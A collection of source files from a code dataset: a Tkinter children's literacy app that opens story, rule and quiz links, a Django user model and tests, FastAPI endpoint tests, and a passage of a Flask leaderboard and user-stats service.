webbrowser.open_new(\"https://www.canva.com/design/DAFMP5tZC7A/dOZLEREy1DWvR-49KVgxZg/view?utm_content=DAFMP5tZC7A&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaPC(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSCMurjiM/eKUhOuIqG00sBgkGe3usxQ/view?utm_content=DAFSCMurjiM&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaH(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSB4A7GzE/zrwxk4yzCkSO3Rnmq9Pusw/view?utm_content=DAFSB4A7GzE&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n################################################## \n def reglaS(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFMQDCzLjE/8xgM-NWwn2W4JvGpO4mFrg/view?utm_content=DAFMQDCzLjE&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaY(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSB5wxs0I/93_7_g0_Si2w6VAFb8Lqyg/view?utm_content=DAFSB5wxs0I&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n################################################## \n def reglaJ(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSEWv_XaA/Hw3mCAYLpcWeLDrNp6yHng/view?utm_content=DAFSEWv_XaA&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\") \n##################################################\n \n def pantalla_Lecturas(self):\n self.paginas.select([self.frame_tres])\n self.frame_tres.columnconfigure(0, weight=1)\n self.frame_tres.columnconfigure(1, weight=1)\n Button(self.frame_tres ,image= self.caperucita, bg='white',command = self.pantalla_lectura).place(x=20,y= 10)\n Button(self.frame_tres ,image= self.lectura2, command = self.tree_pigs, bg='white').place(x=320,y= 10)\n Button(self.frame_tres ,image= self.lectura3, command = self.gatoconbotas, bg='white').place(x=620,y= 10)\n Button(self.frame_tres ,image= self.lectura4, command = self.perroylobo, bg='white').place(x=920,y= 10)\n Button(self.frame_tres ,image= self.lectura5, command = self.risitos, bg='white').place(x=20,y= 320)\n Button(self.frame_tres ,image= self.lectura6, command = self.la_vos, bg='white').place(x=320,y= 320)\n Button(self.frame_tres ,image= self.lectura7, command = self.perro_cazador, bg='white').place(x=620,y= 320)\n Button(self.frame_tres ,image= self.lectura8, command = self.burro_flauta, bg='white').place(x=920,y= 320)\n \n def risitos(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFOSG4fL3o/b4sR-0-8SCHX9-43xAjoJg/view?utm_content=DAFOSG4fL3o&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n \n def tree_pigs(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFSE7Cyrms/_c1lYc2z6FsebFYiVV9fnw/view?utm_content=DAFSE7Cyrms&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n \n def gatoconbotas(self):\n webbrowser.open_new(\"https://www.guiainfantil.com/articulos/ocio/cuentos-infantiles/el-gato-con-botas-fabulas-para-ninos/\")\n \n def la_vos(self):\n webbrowser.open_new(\"https://gabrielxp123.wixsite.com/comprensionlectora/post/la-mejor-voz\")\n \n def perro_cazador(self):\n webbrowser.open_new(\"https://www.mundoprimaria.com/fabulas-para-ninos/el-viejo-perro-cazador\")\n \n def burro_flauta(self):\n webbrowser.open_new(\"https://www.mundoprimaria.com/fabulas-para-ninos/el-burro-y-la-flauta\")\n \n def perroylobo(self):\n webbrowser.open_new(\"https://www.guiainfantil.com/1358/cuento-infantil-pedro-y-el-lobo.html\")\n\n\n\n\n def open_sitio(self):\n webbrowser.open_new(\"https://jazmin-jazz.github.io/Liot---Literatura-y-ortograf-a-/\")\n \n def open_regla1(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFChFmpUjs/N2TXKAtjcCw8VKbMNw64Ww/view?utm_content=DAFChFmpUjs&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n \n def open_manual(self):\n webbrowser.open_new(\"https://issuu.com/carlos.giron2023/docs/manual_de_usuario\")\n \n def open_lectura1(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFNV7jERD0/Gh7hCkDQCksRGwbCgZvb-w/view?utm_content=DAFNV7jERD0&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n\n def pantalla_Quizzes(self):\n self.paginas.select([self.frame_cuatro])\t\n self.frame_cuatro.columnconfigure(0, weight=1)\n self.frame_cuatro.columnconfigure(1, weight=1)\n Button(self.frame_cuatro ,image= self.QuizzB, command = self.quizz_de_B,bg='white').place(x=20,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzC, command = self.quizz_de_C, bg='white').place(x=320,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzH, command = self.quizz_de_H, bg='white').place(x=620,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzJ, command = self.quizz_de_J, bg='white').place(x=920,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzS, command = self.quizz_de_S, bg='white').place(x=20,y= 320)\n Button(self.frame_cuatro ,image= self.QuizzV, command = self.quizz_de_V, bg='white').place(x=320,y= 320)\n Button(self.frame_cuatro ,image= self.QuizzY, command = self.quizz_de_Y, bg='white').place(x=620,y= 320)\n Button(self.frame_cuatro ,image= self.QuizzCom, command = self.quizz_de_Puntoycoma, bg='white').place(x=920,y= 320)\n \n#DONE#############################################################################################\n def quizz_de_B(self):\n webbrowser.open_new(\"https://forms.office.com/Pages/ResponsePage.aspx?id=RL3j2LoLa0KVLa2nuxc5PNVYNA_X4ohOjOWO2uRyZchUMFRMVVBXSDdIS1pYRjNGVTVTWDVFTzNDNy4u\")\n###DONE###############################################################################################\n def quizz_de_H(self):\n webbrowser.open_new(\"https://forms.office.com/Pages/ResponsePage.aspx?id=RL3j2LoLa0KVLa2nuxc5PNVYNA_X4ohOjOWO2uRyZchUREhSMzVRWVo4N0RVWDVJUzhETjRHTFM5RS4u\")\n####DONE##############################################################################################\n def quizz_de_C(self):\n webbrowser.open_new(\"https://forms.office.com/r/1GyZWYX6pZ\")\n###DONE############################################################################################### \n def quizz_de_J(self):\n webbrowser.open_new(\"https://forms.office.com/r/ADDan7emz9\")\n###DONE###############################################################################################\n def quizz_de_S(self):\n webbrowser.open_new(\"https://forms.office.com/r/1GyZWYX6pZ\")\n####DONE##############################################################################################\n def quizz_de_V(self):\n webbrowser.open_new(\"https://forms.office.com/r/7exV5dx7nW\")\n################################################################################################## \n def quizz_de_Y(self):\n webbrowser.open_new(\"https://forms.office.com/r/PwnbyDvvRy\")\n########done##########################################################################################\n def quizz_de_Puntoycoma(self):\n webbrowser.open_new(\"https://forms.office.com/r/M3YCN3PYbi\")\n##################################################################################################\n \n def pantalla_sitio(self):\n self.paginas.select([self.frame_cinco])\n self.frame_cinco.columnconfigure(0, weight=1)\n self.frame_cinco.columnconfigure(1, weight=1)\n self.frame_cinco.columnconfigure(2, weight=1)\n self.frame_cinco.rowconfigure(2, weight=1)\n Label(self.frame_cinco ,image= self.fondo, bg='white').place(x=0,y= 0)\n Label(self.frame_cinco ,image= self.nota, bg='white').place(x=200,y= 0)\n Label(self.frame_cinco ,image= self.logo3, bg='white').place(x=40,y=115)\n Label(self.frame_cinco ,image= self.nota3, bg='white').place(x=600,y=115)\n buttonIr=Button(self.frame_cinco, image= self.botonIr, bd=0, bg = \"white\", command= self.open_sitio)\n buttonIr.place(x=800, y=460)\n############################################################################################################################\n def pantalla_reglaY(self):\n self.paginas.select([self.frame_seis])\n\n next1 = leer_imagen(\"./img carrusel/next.png\",(60,60))\n privius = leer_imagen(\"./img carrusel/previous.png\",(60,60))\n regla_2 = leer_imagen(\"./Reglas/reglaY1.png\",(1100,620))\n regla_3 = leer_imagen(\"./Reglas/reglaY2.png\",(1100,620))\n regla_4 = leer_imagen(\"./Reglas/reglaY3.png\",(1100,620))\n regla_5 = leer_imagen(\"./Reglas/reglaY4.png\",(1100,620))\n regla_6 = leer_imagen(\"./Reglas/reglaY5.png\",(1100,620))\n regla_7 = leer_imagen(\"./Reglas/reglaY6.png\",(1100,620))\n regla_8 = leer_imagen(\"./Reglas/reglaY7.png\",(1100,620))\n regla_9 = leer_imagen(\"./Reglas/reglaY8.png\",(1100,620))\n regla_10 = leer_imagen(\"./Reglas/reglaY9.png\",(1100,620))\n regla_11 = leer_imagen(\"./Reglas/reglaY10.png\",(1100,620))\n regla_12 = leer_imagen(\"./Reglas/reglaY11.png\",(1100,620))\n\n lista_cuadros = [regla_2, regla_3, regla_4, regla_5, regla_6, regla_7, regla_8, regla_9, regla_10, regla_11, regla_12]\n\n def adelante(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n label_pre.place_forget()\n \n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 10:\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y=400)\n btn_adelante.place(x=1215,y=400)\n\n def atras(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre.place_forget()\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n\n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 0:\n btn_atras = Button(frame_central,image=privius, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y= 400)\n btn_adelante.place(x=1215,y=400)\n\n\n frame_central = Frame(self.frame_seis, height= 900, width=1355, bg=\"white\")\n frame_central.place(x=-60,y=-155)\n\n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", state=DISABLED)\n btn_atras.place(x=50,y= 400)\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(1))\n btn_adelante.place(x= 1215,y= 400)\n\n frame1 = Frame(frame_central, height=900, width=1120, bg=\"white\")\n frame1.place(x=100,y=90)\n label_pre = Label(frame1,image= regla_2, bg=\"white\")\n label_pre.place(x=10,y=55)\n\n\n########################################################################### \n def pantalla_ayuda2(self):\n self.paginas.select([self.frame_siete])\n self.frame_siete.columnconfigure(0, weight=1)\n self.frame_siete.columnconfigure(1, weight=1)\n self.frame_siete.columnconfigure(2, weight=1)\n self.frame_siete.rowconfigure(2, weight=1)\n Button(self.frame_siete ,image= self.manual1, bg='white', command=self.open_manual).place(x=60,y=10)\n Label(self.frame_siete ,text= \"Manual de usuario\", bg= 'white',font= ('Lucida Sans', 15)).place(x=95,y=270)\n Button(self.frame_siete ,image= self.manual2, bg='white', command=self.open_manual).place(x=360,y=10)\n Label(self.frame_siete ,text= \"Manual técnico\", bg= 'white',font= ('Lucida Sans', 15)).place(x=396,y=270)\n\n################################################################################################\n \n def pantalla_lectura(self):\n self.paginas.select([self.frame_ocho])\n\n next1 = leer_imagen(\"./img carrusel/next.png\",(60,60))\n privius = leer_imagen(\"./img carrusel/previous.png\",(60,60))\n foto_grup1 = leer_imagen(\"./img carrusel/img1.png\",(1100,620))\n img_2 = leer_imagen(\"./img carrusel/img2.png\",(1100,620))\n img_3 = leer_imagen(\"./img carrusel/img3.png\",(1100,620))\n img_4 = leer_imagen(\"./img carrusel/img4.png\",(1100,620))\n img_5 = leer_imagen(\"./img carrusel/img5.png\",(1100,620))\n img_6 = leer_imagen(\"./img carrusel/img6.png\",(1100,620))\n img_7 = leer_imagen(\"./img carrusel/img7.png\",(1100,620))\n\n lista_cuadros = [foto_grup1, img_2, img_3, img_4, img_5, img_6, img_7]\n\n def adelante(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n label_pre.place_forget()\n \n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 6:\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y=400)\n btn_adelante.place(x=1215,y=400)\n\n def atras(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre.place_forget()\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n\n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 0:\n btn_atras = Button(frame_central,image=privius, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y= 400)\n btn_adelante.place(x=1215,y=400)\n\n frame_central = Frame(self.frame_ocho, height= 900, width=1355, bg=\"white\")\n frame_central.place(x=-60,y=-155)\n\n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", state=DISABLED)\n btn_atras.place(x=50,y= 400)\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(1))\n btn_adelante.place(x= 1215,y= 400)\n\n frame1 = Frame(frame_central, height=900, width=1120, bg=\"white\")\n frame1.place(x=100,y=90)\n label_pre = Label(frame1,image=foto_grup1, bg=\"white\")\n label_pre.place(x=10,y=55)\n\n###################################################################################\n\n def menu_lateral(self):\n if self.menu is True:\n for i in range(50,170,10):\t\t\t\t\n self.frame_menu.config(width= i)\n self.frame_inicio.config(width= i)\n self.frame_menu.update()\n clik_inicio = self.bt_cerrar.grid_forget()\n if clik_inicio is None:\t\t\n self.bt_inicio.grid(column=0, row=0, padx =10, pady=10)\n self.bt_inicio.grid_propagate(0)\n self.bt_inicio.config(width=i)\n self.pantalla_inicial()\n self.menu = False\n else:\n for i in range(170,50,-10):\n self.frame_menu.config(width= i)\n self.frame_inicio.config(width= i)\n self.frame_menu.update()\n clik_inicio = self.bt_inicio.grid_forget()\n if clik_inicio is None:\n self.frame_menu.grid_propagate(0)\t\t\n self.bt_cerrar.grid(column=0, row=0, padx =10, pady=10)\n self.bt_cerrar.grid_propagate(0)\n self.bt_cerrar.config(width=i)\n self.pantalla_inicial()\n self.menu = True\n\n\n def widgets(self):\n self.imagen_inicio = PhotoImage(file ='inicio.png')\n self.imagen_menu = PhotoImage(file ='menu.png')\n self.imagen_cuenta = PhotoImage(file ='letras2.png')\n self.imagen_sitio = PhotoImage(file ='lecturas.png')\n self.imagen_config = PhotoImage(file ='quizz2.png')\n self.imagen_ayuda = PhotoImage(file ='sitio.png')\n self.imagen_ajustes = PhotoImage(file ='ayuda2.png')\n self.imagen_ayuda2 = PhotoImage(file ='ayuda2.png')\n #self.imagen_lectura = PhotoImage(file = 'letras.png')\n ###################################################################\n self.ReglaY = PhotoImage (file='uso y.png')\n self.ReglaB = PhotoImage (file='uso b.png')\n self.ReglaC = PhotoImage (file='uso c.png')\n self.ReglaH = PhotoImage (file='uso h.png')\n self.ReglaS = PhotoImage (file='uso s.png')\n self.ReglaV = PhotoImage (file='uso v.png')\n self.ReglaJ = PhotoImage (file='uso j.png')\n self.Reglapunt = PhotoImage (file='uso punco.png')\n #################################################################\n self.caperucita = PhotoImage (file='./img cuentos/caperucita.png')\n self.lectura2 = PhotoImage (file='./img cuentos/cerditos.png')\n self.lectura3 = PhotoImage (file='./img cuentos/gato.png')\n self.lectura4 = PhotoImage (file='./img cuentos/lobo.png')\n self.lectura5 = PhotoImage (file='./img cuentos/risitos.png')\n self.lectura6 = PhotoImage (file='./img cuentos/voz.png')\n self.lectura7 = PhotoImage (file='./img cuentos/perro.png')\n self.lectura8 = PhotoImage (file='./img cuentos/burro.png')\n #################################################################\n self.logo = PhotoImage(file ='portada.png')\n self.fondo = PhotoImage(file ='fondo.png')\n self.nota = PhotoImage(file ='nota.png')\n self.nota3 = PhotoImage(file ='nota3.png')\n self.logo3 = PhotoImage(file ='logo3.png')\n self.botonIr = PhotoImage(file ='ir.png')\n self.manual1 = PhotoImage(file ='manual1.png')\n self.manual2 = PhotoImage(file ='manual2.png')\n ##################################################################\n self.QuizzH = PhotoImage (file='quizz h.png')\n self.QuizzB = PhotoImage (file='quizz b.png')\n self.QuizzC = PhotoImage (file='quizz c.png')\n self.QuizzY = PhotoImage (file='Quizz Y.png')\n self.QuizzS = PhotoImage (file='quizz s.png')\n self.QuizzJ = PhotoImage (file='quizz j.png')\n self.QuizzV = PhotoImage (file='quizz v.png')\n self.QuizzCom = PhotoImage (file='quizz com.png')\n ##################################################################\n self.bt_inicio = Button(self.frame_inicio, image= self.imagen_inicio, bg='white',activebackground='white', bd=0, command = self.menu_lateral)\n self.bt_inicio.grid(column=0, row=0, padx=5, pady=10)\n self.bt_cerrar = Button(self.frame_inicio, image= self.imagen_menu, bg='white',activebackground='white', bd=0, command = self.menu_lateral)\n self.bt_cerrar.grid(column=0, row=0, padx=5, pady=10)\t\n\n #BOTONES Y ETIQUETAS DEL MENU LATERAL \n #Items y texto con fondo gris #ecf0f1\n Button(self.frame_menu, image= self.imagen_cuenta, bg='white', activebackground='white', bd=0, command = self.pantalla_reglas).grid(column=0, row=1, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_sitio, bg='white',activebackground='white', bd=0, command = self.pantalla_Lecturas).grid(column=0, row=2, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_config, bg= 'white',activebackground='white', bd=0, command = self.pantalla_Quizzes).grid(column=0, row=3, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_ayuda, bg= 'white',activebackground='white', bd=0, command = self.pantalla_sitio).grid(column=0, row=4, pady=20,padx=10)\t\t\n #Button(self.frame_menu, image= self.imagen_ajustes, bg= '#ecf0f1',activebackground='#ecf0f1', bd=0, command = self.pantalla_reglaY).grid(column=0, row=5, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_ayuda2, bg= 'white',activebackground='white', bd=0, command = self.pantalla_ayuda2).grid(column=0, row=5, pady=20,padx=10)\n\n Label(self.frame_menu, text= 'Reglas', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=1, pady=20, padx=2)\n Label(self.frame_menu, text= 'Lecturas', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=2, pady=20, padx=2)\n Label(self.frame_menu, text= 'Quizzes', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=3, pady=20, padx=2)\n Label(self.frame_menu, text= 'Sitio web', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=4, pady=20, padx=2)\t\n Label(self.frame_menu, text= 'Ayuda', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=5, pady=20, padx=2)\n #Label(self.frame_menu, text= '', bg= '#ecf0f1', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=5, pady=20, padx=2)\n\n ############################# CREAR PÁGINAS ##############################\n \n estilo_paginas = ttk.Style()\n estilo_paginas.configure(\"TNotebook\", background='white', foreground='white', padding=0, borderwidth=0)\n estilo_paginas.theme_use('default')\n estilo_paginas.configure(\"TNotebook\", background='white', borderwidth=0)\n estilo_paginas.configure(\"TNotebook.Tab\", background=\"white\", borderwidth=0)\n estilo_paginas.map(\"TNotebook\", background=[(\"selected\", 'white')])\n estilo_paginas.map(\"TNotebook.Tab\", background=[(\"selected\", 'white')], foreground=[(\"selected\", 'white')]);\n\n #CREACCION DE LAS PAGINAS \n self.paginas = ttk.Notebook(self.frame_principal , style= 'TNotebook') #, style = 'TNotebook'\n self.paginas.grid(column=0,row=0, sticky='nsew')\n self.frame_uno = Frame(self.paginas, bg='white')\n self.frame_dos = Frame(self.paginas, bg='white')\n self.frame_tres = Frame(self.paginas, bg='white')\n self.frame_cuatro = Frame(self.paginas, bg='white')\n self.frame_cinco = Frame(self.paginas, bg='white')\n self.frame_seis = Frame(self.paginas, bg='white')\n self.frame_siete = Frame(self.paginas, bg='white')\n self.frame_ocho = Frame(self.paginas, bg='white')\n self.frame_quizz_h = Frame(self.paginas, bg='white')\n self.paginas.add(self.frame_uno)\n self.paginas.add(self.frame_dos)\n self.paginas.add(self.frame_tres)\n self.paginas.add(self.frame_cuatro)\n self.paginas.add(self.frame_cinco)\n self.paginas.add(self.frame_seis)\n self.paginas.add(self.frame_siete)\n self.paginas.add(self.frame_ocho)\n self.paginas.add(self.frame_quizz_h)\n\n ######################## FRAME TITULO #################\n #self.titulo = Label(self.frame_top,text= 'APLICACION DE ESCRITORIO EN PYTHON CON TKINTER', bg='white', fg= 'DarkOrchid1', font= ('Imprint MT Shadow', 15, 'bold'))\n #self.titulo.pack(expand=1)\n ######################## VENTANA PRINCIPAL #################\n #Label(self.frame_uno, text= 'Electrónica Programación y Tecnología', bg='DarkOrchid1', fg= 'white', font= ('Freehand521 BT', 20, 'bold')).pack(expand=1)\n Label(self.frame_uno ,image= self.logo, bg='white').place(x=0,y=-10)#.pack(expand=1)\n\n################################################################################\n if __name__ == \"__main__\":\n ventana = Tk()\n ventana.title('Liot')\n ventana.minsize(height= 650, width=1200)\n ventana.geometry('1000x500+180+80')\n ventana.call('wm', 'iconphoto', ventana._w, PhotoImage(file='lecturas.png'))\t\n app = Ventana(ventana)\n app.mainloop()","repo_name":"jimenanicole/App-Liot","sub_path":"LIOT1/unosolo.py","file_name":"unosolo.py","file_ext":"py","file_size_in_byte":32823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42679158325","text":"from django.contrib.auth.models import AbstractUser\nfrom django.core.validators import RegexValidator\nfrom django.db import models\n\n\nclass User(AbstractUser):\n\n class UserRoles(models.TextChoices):\n USER = 'user', ('User')\n MODERATOR = 'moderator', ('Moderator')\n ADMIN = 'admin', ('Admin')\n\n username = models.CharField(\n max_length=150,\n null=False,\n blank=False,\n unique=True,\n verbose_name='Имя пользователя',\n validators=[\n RegexValidator(\n regex=r'^[\\w.@+-]+$',\n message='Имя поля содержит недопустимый символ',\n )\n ]\n )\n email = models.EmailField(\n max_length=254,\n unique=True,\n blank=False,\n verbose_name='Адрес электронной почты'\n )\n first_name = models.CharField(\n max_length=150,\n blank=True,\n verbose_name='Имя'\n )\n last_name = models.CharField(\n max_length=150,\n blank=True,\n verbose_name='Фамилия'\n )\n date_joined = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Время регистрации'\n )\n bio = models.TextField(\n blank=True,\n verbose_name='Дополнительная информация'\n )\n role = models.CharField(\n max_length=100,\n choices=UserRoles.choices,\n default=UserRoles.USER,\n verbose_name='Пользовательская роль (определяет права доступа)'\n )\n\n @property\n def is_moderator(self):\n return self.role == self.UserRoles.MODERATOR\n\n @property\n def is_admin(self):\n return (\n self.role == self.UserRoles.ADMIN\n or self.is_staff\n or self.is_superuser\n )\n\n class Meta:\n ordering = ['username']\n","repo_name":"NECROshizo/YaMDb","sub_path":"api_yamdb/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1442722807","text":"from django.test import TestCase\nfrom vehicles_demo.apps.vehicles.models import Customer, Vehicles\n\nclass TestSearch(TestCase):\n fixtures = [\n 'customers.json',\n 'vehicles.json'\n ]\n \n def setUp(self):\n self.customer = Customer.objects.first()\n\n def test_search_per_customer_name(self):\n response = self.client.get('/search/?customer_name={}'.format(self.customer.name))\n self.assertEquals(len(response.json()), self.customer.vehicles.all().count())\n \n def test_search_per_vehicle_status(self):\n response = self.client.get('/search/?online=true')\n self.assertEquals(len(response.json()), Vehicles.objects.filter(online=True).count())\n \n def test_search_per_vehicle_status_and_customer_name(self):\n response = self.client.get('/search/?online=true&customer_name={}'.format(self.customer.name))\n self.assertEquals(\n len(response.json()), \n Vehicles.objects.filter(\n online=True, \n customer__name__contains=self.customer.name\n ).count())","repo_name":"alpham/SwedQ-vehicle-task","sub_path":"backend/vehicles_demo/apps/vehicles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"497074828","text":"import pytest\nfrom fastapi.testclient import TestClient\n\nfrom webapp import app\n\n\n@pytest.fixture()\ndef fastapi_client() -> TestClient:\n return TestClient(app)\n\n\ndef test_api_root(\n fastapi_client: TestClient,\n url_root: str,\n):\n response = fastapi_client.get(url_root)\n assert 200 == response.status_code\n assert \"Service is working\" in response.text\n\n\ndef test_api_predict(\n fastapi_client: TestClient,\n fake_test_dataset_json: str,\n url_predict: str,\n):\n data = {\"data\": fake_test_dataset_json}\n with fastapi_client:\n response = fastapi_client.get(url_predict, json=data)\n assert 200 == response.status_code\n preds = response.json()\n assert {0, 1} == set(preds)\n","repo_name":"made-ml-in-prod-2021/n0rdream","sub_path":"online_inference/tests/test_api_with_fastapi_client.py","file_name":"test_api_with_fastapi_client.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17342516474","text":"from flask import (Flask, Response, g,\n request, jsonify,\n abort, render_template)\nfrom redis import Redis\nfrom rq import Queue\nimport MySQLdb as mdb\nimport json\nimport numpy as np\nimport logging\n\nfrom process_session import process_session\nimport mysql_config as mc\n\nRACE_MODE_ID = 3\nHISTORY_LENGTH = 10\n\n#####################\n# Exp need to level #\n#####################\n# Lv.1 Lv.2 Lv.3 Lv.4 Lv.5 Lv.6 Lv.7 Lv.8 Lv.9\n_exp_needed = [10.0, 20.0, 30.0, 40.0, 80.0, 160.0, 320.0, 640.0, 1280.0]\n\napp = Flask(__name__)\n\n@app.before_request\ndef db_connect():\n g.db_con = mdb.connect('localhost', \n mc.mysql_username,\n mc.mysql_password,\n mc.mysql_database,\n charset='utf8')\n cur = g.db_con.cursor()\n cur.execute(\"SET NAMES utf8mb4\")\n\n@app.teardown_request\ndef db_disconnect(exception=None):\n db_con = getattr(g, 'db_con', None)\n if db_con is not None:\n db_con.commit()\n db_con.close()\n\n#########################################\n\n@app.route(\"/leaderboard\")\ndef leaderboard():\n try:\n con = g.db_con\n \n from datetime import date, timedelta\n today = date.today()\n monday = today - timedelta(days=today.weekday())\n next_monday = monday + timedelta(weeks=1);\n\n # get best weekly bps\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT t2.displayname, t2.level, COALESCE(MAX(t1.bps),0) AS max_bps\n FROM sessions AS t1, users AS t2\n WHERE t1.user_id = t2.user_id\n AND t1.mode_id = %s \n AND t1.added_on > %s\n AND t2.user_id = t2.linked_id\n GROUP BY t1.user_id\n ORDER BY max_bps DESC\n LIMIT 10\n \"\"\",(RACE_MODE_ID,monday))\n rows = cur.fetchall()\n users = []\n for i,row in enumerate(rows):\n rank = i+1\n username = row[0]\n level = row[1]\n bps = row[2]\n if username.startswith('FB_'):\n username = username[3:] + ' (FB)'\n elif username.startswith('PF_'):\n username = username[3:]\n\n # truncate string to 18 chars\n username = ((username[:18] + '...') if len(username) > 18 \n else username)\n\n users.append({'rank' : rank,\n 'username' : username,\n 'level' : level,\n 'bps' : \"%0.2f\"%bps})\n\n return render_template('leaderboard.html', \n users=users, \n reset=next_monday.strftime(\"%Y/%m/%d\"))\n except:\n app.logger.exception(\"An exception has been raised\")\n abort(400)\n\n#########################################\n\n@app.route(\"/userstats\", methods=['POST'])\ndef userstats():\n try:\n key = request.form['key'] \n if (key != mc.secret_key): abort(403)\n\n user_id = request.form['user_id']\n if int(user_id) == 0: \n return jsonify({'ERROR':1})\n\n con = g.db_con\n \n # get exp and level\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor)\n cur.execute(\"\"\"\n SELECT experience,level,next_level_exp \n FROM users WHERE user_id=%s\"\"\",(user_id,))\n resp = cur.fetchone()\n\n if resp['level'] == 0:\n resp['this_level_exp'] = resp['experience']\n else:\n resp['this_level_exp'] = (resp['experience'] - \n np.sum(_exp_needed[:resp['level']]))\n \n # get best bps\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT COALESCE(MAX(bps),0) FROM sessions \n WHERE user_id=%s\n \"\"\",(user_id,))\n row = cur.fetchone()\n resp['best_bps'] = row[0]\n\n # get recent bps from race mode\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT bps FROM sessions \n WHERE user_id=%s\n ORDER BY session_id DESC\n LIMIT %s;\n \"\"\",(user_id,\n HISTORY_LENGTH))\n rows = cur.fetchall()\n resp['recent_bps'] = [row[0] for row in rows]\n resp['recent_bps'].reverse()\n\n return jsonify(resp)\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR':1})\n\n\n#########################################\n\n@app.route(\"/annoucement\", methods=['POST'])\ndef annoucement():\n try:\n key = request.form['key'] \n if (key != mc.secret_key): abort(403)\n\n con = g.db_con\n cur = 